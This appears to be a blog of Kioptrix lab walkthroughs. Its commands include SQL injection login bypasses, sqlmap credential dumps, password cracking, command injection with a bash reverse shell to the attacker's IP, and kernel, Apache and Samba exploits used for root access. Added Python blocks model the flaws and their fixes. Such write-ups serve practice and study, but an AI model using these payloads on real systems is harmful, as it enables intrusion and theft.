Saturday, March 30, 2019

Kioptrix4

netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
enum4linux -a 192.168.0.4 | tee e4l.txt
nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
vi dirb.txt
Knowing from the dirb results that the john directory existed, I opened john/john.php directly in the browser.

Using the manual process to determine whether the web site was vulnerable to SQL injection, I simply added a single quote (') to the Username and Password fields and then clicked the Login button.
Interestingly, I discovered that there was a MySQL database and that the page checklogin.php was being used.
Next, I used the SMB usernames discovered earlier together with the SQL injection payload blah' OR 1=1 -- - or 'OR'1'='1 in the Password field.
 
ssh john@192.168.0.3
The account has a restricted shell with limited access.
 
Knowing that Python is usually installed on Ubuntu by default, I decided to try the following example from the SANS documentation:
python: exit_code = os.system('/bin/sh'); output = os.popen('/bin/sh').read()
After some time, I issued the echo command with the Python os module's system() function in order to call /bin/bash:
echo os.system('/bin/bash');
Tried sudo su, but no luck.
cat /var/www/checklogin.php
Found the MySQL root password, which is empty (null).
Checked whether MySQL was running as root or under a different credential:
ps -ef | grep mysql
It was running as root.
MySQL supports user-defined functions (UDF). So, I issued the locate udf command to see if the UDF library was installed on the system.


mysql -u root
select * from mysql.func; 
select sys_exec('usermod -a -G admin  john');
exit
sudo su
boom... you have root!!

Read the flag: cat /root/congrats.txt

Sunday, March 10, 2019

kioptrix3

netdiscover -r 192.168.0.0/24

nmap -sS -T4 -oA kioptrix3 192.168.0.3

nikto -host 192.168.0.3 -port 80 -output nikto.html

searchsploit -w lotuscms

We found a remote code execution exploit for LotusCMS, which can be run through msf, with netcat, or directly.

msfconsole: search lotuscms

use exploit/multi/http/lcms_php_exec

RHOST = IP address of kioptrix3
RPORT = 80
URI = / (as found with nmap and nikto)
LPORT = local port on the Kali system that the RHOST connects back to

run
You will get a shell; it can read /etc/passwd but not /etc/shadow.

Tried to access the users' home directories:
In reviewing /home/dreg there was nothing interesting. However, reviewing /home/loneferret turned up some interesting information.
We found a CompanyPolicy.README file, which shows that loneferret can use sudo ht.

Further inspection of /home/www/kioptrix3.com/gallery/gconfig.php shows hard-coded root credentials for the gallery database, i.e. the password fucyeyou.

Next, I launched a browser and opened phpMyAdmin on the Kioptrix system's IP address (http://192.168.0.3/phpmyadmin).

Exploring the database application, we found 3 databases:

gallery
information_schema
mysql

The gallery database contains a table called dev_accounts, which holds usernames and password hashes.

Seeing that the local website used PHP, I tried to determine whether the PHP scripts sanitized their input. I added ../../../../../etc/passwd directly after the = sign in the URL.

Unfortunately, I did not receive any results, so I turned to the Internet to research PHP LFI vulnerabilities. The OWASP "Testing for Local File Inclusion" guide notes that a null-byte terminator may be needed to signify the end of the string.
So, I re-entered ../../../../../etc/passwd and added jpg at the end of the string, as suggested in the OWASP article.

http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml
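As an added example (not from the original write-up), the traversal and null-byte behaviour described above modelled in Python: the vulnerable resolver mirrors include($_GET['system'] . '.html') with the C-level NUL truncation old PHP builds suffered, and the hardened one rejects NUL bytes and anything outside the page directory. The page directory and page names are assumptions.

```python
import os
from pathlib import PurePosixPath

# Assumed location of the included .html pages (constructed for this demo).
PAGE_DIR = PurePosixPath("/var/www/kioptrix3.com/pages")


def c_string(path: str) -> str:
    """What a C-level open() sees: old PHP handed the path to libc, which stops at the first NUL."""
    return path.split("\x00", 1)[0]


def vulnerable_page_path(system: str) -> str:
    """Mirrors include($system . ".html"): user input is the path and the suffix is appended blindly."""
    raw = str(PAGE_DIR / (system + ".html"))
    return c_string(os.path.normpath(raw))


def hardened_page_path(system: str) -> str:
    """Reject NUL bytes, then require the normalised path to stay under PAGE_DIR with a .html suffix."""
    if "\x00" in system:
        raise ValueError("NUL byte in page name")
    candidate = PurePosixPath(os.path.normpath(str(PAGE_DIR / (system + ".html"))))
    if PAGE_DIR not in candidate.parents or candidate.suffix != ".html":
        raise ValueError("page outside the page directory")
    return str(candidate)


def is_safe_page(system: str) -> bool:
    """True when the hardened resolver would serve the requested page."""
    try:
        hardened_page_path(system)
        return True
    except ValueError:
        return False
```

With the plain traversal the vulnerable resolver opens /etc/passwd.html (which does not exist, matching the empty result above); with a NUL before the appended suffix it opens /etc/passwd.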

The attacking system must have its /etc/hosts file updated with an entry for kioptrix3.com. Otherwise, references to kioptrix3.com will try to reach the Internet and the image files may not be displayed correctly.

sqlmap -u http://192.168.0.3/gallery/index.php
sqlmap -u http://192.168.0.3/gallery/recent.php
sqlmap -u http://192.168.0.3/gallery/g.php/1

The above commands did not give sufficient results, so I tried further.

Using the commands below, we found the usernames and password hashes:

sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid"
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1" --dbs
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1" -D gallery --tables
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump
sqlmap -u "http://192.168.0.3/gallery/gallery.php?id=1" -D mysql -T user --dump -C 'host,user,password'
  

Having the usernames from /etc/passwd and now the usernames and hashes from phpMyAdmin, I had enough information to use a password cracker to recover the credentials. I decided to use Hydra and Hashcat.

Method 1:

I created a text file named users and added the loneferret and dreg usernames to it. I then launched Hydra to brute force the Kioptrix system using the following parameters:
· -L = login file
· -P = password file
· ssh = service (protocol) to attack
· -e nsr = n: null password, s: login as password, r: reversed login
· -f = exit after a login/password pair is found
· -t 4 = number of parallel connect tasks

hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force

ssh loneferret@192.168.0.3 (password: starwars)
sudo -l



Unfortunately, I ran into an error opening the editor with xterm-256color. After some research I found that running export TERM=xterm works around the xterm-256color error.
sudo ht

Open /etc/sudoers in ht and carefully update the sudoers file:

add ,/bin/sh directly after /usr/local/bin/ht (the comma separates the two commands)

Save and exit.

Then use
sudo /bin/sh

you have root access!!
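An added check (not part of the original write-up) for the weakness used above: a small sudoers auditor that flags entries granting an editor, pager, interpreter or shell, since any of those (ht included) lets the user rewrite /etc/sudoers itself, and entries granting ALL, which also covers the Kioptrix4 case earlier on this page where admin-group membership was enough. The sudoers excerpt and the SHELL_CAPABLE list are constructed for the demo.

```python
import re

# Binaries that can open a shell or write arbitrary files once run through sudo (constructed list).
SHELL_CAPABLE = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash", "python", "perl"}

# Constructed excerpt, not the real Kioptrix sudoers file.
SUDOERS_SAMPLE = """\
Defaults env_reset
loneferret ALL=(ALL) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht   # from CompanyPolicy.README
dreg       ALL=(ALL) /usr/bin/id
%admin     ALL=(ALL) ALL
"""

# user-or-group  host=(runas)  [TAG:] cmd, cmd ...
USER_SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")


def audit_sudoers(text):
    """Return (principal, command) pairs that give the principal a route to a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and surrounding whitespace
        if not line or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())  # strip NOPASSWD: and similar tags
            if not cmd or cmd.startswith("!"):       # empty or negated entry
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append((m.group("who"), cmd))
    return findings
```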




Wednesday, February 20, 2019

Kioptrix_level2

netdiscover -f -r 192.168.0.0/24

nmap -sS -T4 -A 192.168.0.9

nikto -host 192.168.0.9 -port 80 -output nikto.html

SQL injection

username admin and password 'OR'1'='1
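The login bypass used here and in the Kioptrix4 walkthrough earlier on this page, as an added example that is not part of the original post: the string-built query beside its parameterized replacement, run against a constructed in-memory SQLite table (the table, the users and the function names are assumptions; the real checklogin.php is not shown on the page).

```python
import sqlite3


def make_db():
    """Constructed sample members table standing in for the web application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [("john", "correct-horse"), ("robert", "battery-staple")])
    return db


def checklogin_vulnerable(db, username, password):
    """The checklogin.php pattern: user input is pasted straight into the SQL text."""
    sql = ("SELECT username FROM members WHERE username='" + username
           + "' AND password='" + password + "'")
    # 'OR'1'='1 closes the password literal and appends OR '1'='1';
    # blah' OR 1=1 -- - does the same and comments out the trailing quote.
    return db.execute(sql).fetchone() is not None


def checklogin_hardened(db, username, password):
    """Parameterized query: the values are bound by the driver and can never change the SQL."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    # Storing plaintext passwords is a separate defect; hashing is outside this example.
    return db.execute(sql, (username, password)).fetchone() is not None
```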

ping 127.0.0.1;cat /etc/passwd

;uname -ar

On Kali Linux: run nc -nlvp 443

On kioptrix: ; bash -i >& /dev/tcp/172.16.209.129/443 0>&1

You will get shell access on Kali.

Run whoami

It will show apache
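An added example (not from the original write-up) of why the ping form above runs ;uname -ar and ;cat /etc/passwd: the vulnerable handler hands a concatenated string to the shell, while the hardened one validates the value as an IP address and passes it to ping as a single argv element with no shell. The function names are assumptions; the injected command used in the demonstration is a harmless echo.

```python
import ipaddress
import subprocess


def run_ping_vulnerable(host):
    """The form's pattern: shell=True plus string concatenation, so ';' ends ping and starts a new command."""
    cmd = "ping -c 1 -W 1 " + host
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def is_valid_host(host):
    """Allowlist check: only a literal IPv4 or IPv6 address is accepted."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def run_ping_hardened(host):
    """Validate first, then pass argv as a list: the value stays one argument to ping, never shell syntax."""
    if not is_valid_host(host):
        raise ValueError("not an IP address: %r" % host)
    result = subprocess.run(["ping", "-c", "1", "-W", "1", host], capture_output=True, text=True)
    return result.stdout
```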

Now go back to kali

cat /etc/*-release (it will show CentOS 4.5)
 
Run searchsploit -w linux kernel CentOS
9545.c is the privilege escalation exploit

python -m SimpleHTTPServer 80

wget http://kalilinuxIP/9545.c

after file getting downloaded

gcc -o priv 9545.c

chmod 755 priv

./priv

whoami (you will see root)



cat .bash_history

Netdiscover

netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]
-i device -- The network interface to sniff and inject packets. If no interface is specified, first available will be used.
-r range -- Scan a given range instead of auto scan. Valid range values area for example: 192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8.
-p -- Enable passive mode. In passive mode, netdiscover does not send anything, but does only sniff.
-s time -- Sleep given time in milliseconds between each arp request injection. (default 1)
-c count -- Number of times to send each arp request. Useful for networks with packet loss, so it will scan given times for each host.
-n node -- Last ip octet of the source ip used for scanning. You can change it if the default host is already used. (allowed range: 2 to 253, default 66)
-S -- Enable sleep time suppression between each request. If set, netdiscover will sleep after having scanned 255 hosts instead of sleeping after each one.
This mode was used in netdiscover 0.3 beta4 and before. Avoid this option in networks with packet loss, or in wireless networks with low signal level. (also called hardcore mode)
-f -- Enable fast mode scan. This will only scan for .1, .100 and .254 on each network. This mode is usefull while searching for ranges being used. After you found such range you can make a specific range scan to find online boxes.

Sunday, January 13, 2019

Pentest_Level1

nmap -sV <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <basename> <IP>

nmap -p- -sV -sS -T4 -A <IP>

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

This Apache version is vulnerable to OpenFuck. The old openfuck.c does not work, so get the latest OpenFuck from GitHub: "https://github.com/heltonWernik/OpenLuck"

Use the following steps:
1. Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
2. Install the ssl-dev library
apt-get install libssl-dev
3. Compile it
gcc -o OpenFuck OpenFuck.c -lcrypto
4. Run the exploit
./OpenFuck
5. Pick the target you wish to exploit. For example, for Red Hat Linux with Apache 1.3.20, try the 0x6a option: ./OpenFuck 0x6a [Target Ip] [port] -c 40
For example:
./OpenFuck 0x6a 192.168.80.145 443 -c 40
enum4linux: use this command to check RPC login with a null username and null password and to get other details.

samba version: to find the version of Samba, use the scanner

use auxiliary/scanner/smb/smb_version

samba: samba2.2.1a

This version has the trans2open vulnerability and the exploit is available in Metasploit.

exploit: use exploit/linux/samba/trans2open

Set the payload with the exploit: set payload linux/x86/meterpreter/reverse_tcp (it will not work)
then use any payload from the list below:
set payload
generic/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp


NMAP

Nmap 5.61TEST5 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL : Input from list of hosts/networks
  -iR : Choose random targets
  --exclude : Exclude hosts/networks
  --excludefile : Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers : Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags : Customize TCP scan flags
  -sI : Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p : Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports : Scan  most common ports
  --port-ratio : Scan ports more common than 
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity : Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=:  is a comma separated list of
           directories, script-files or script-categories
  --script-args=: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=: Show help about scripts.
            is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take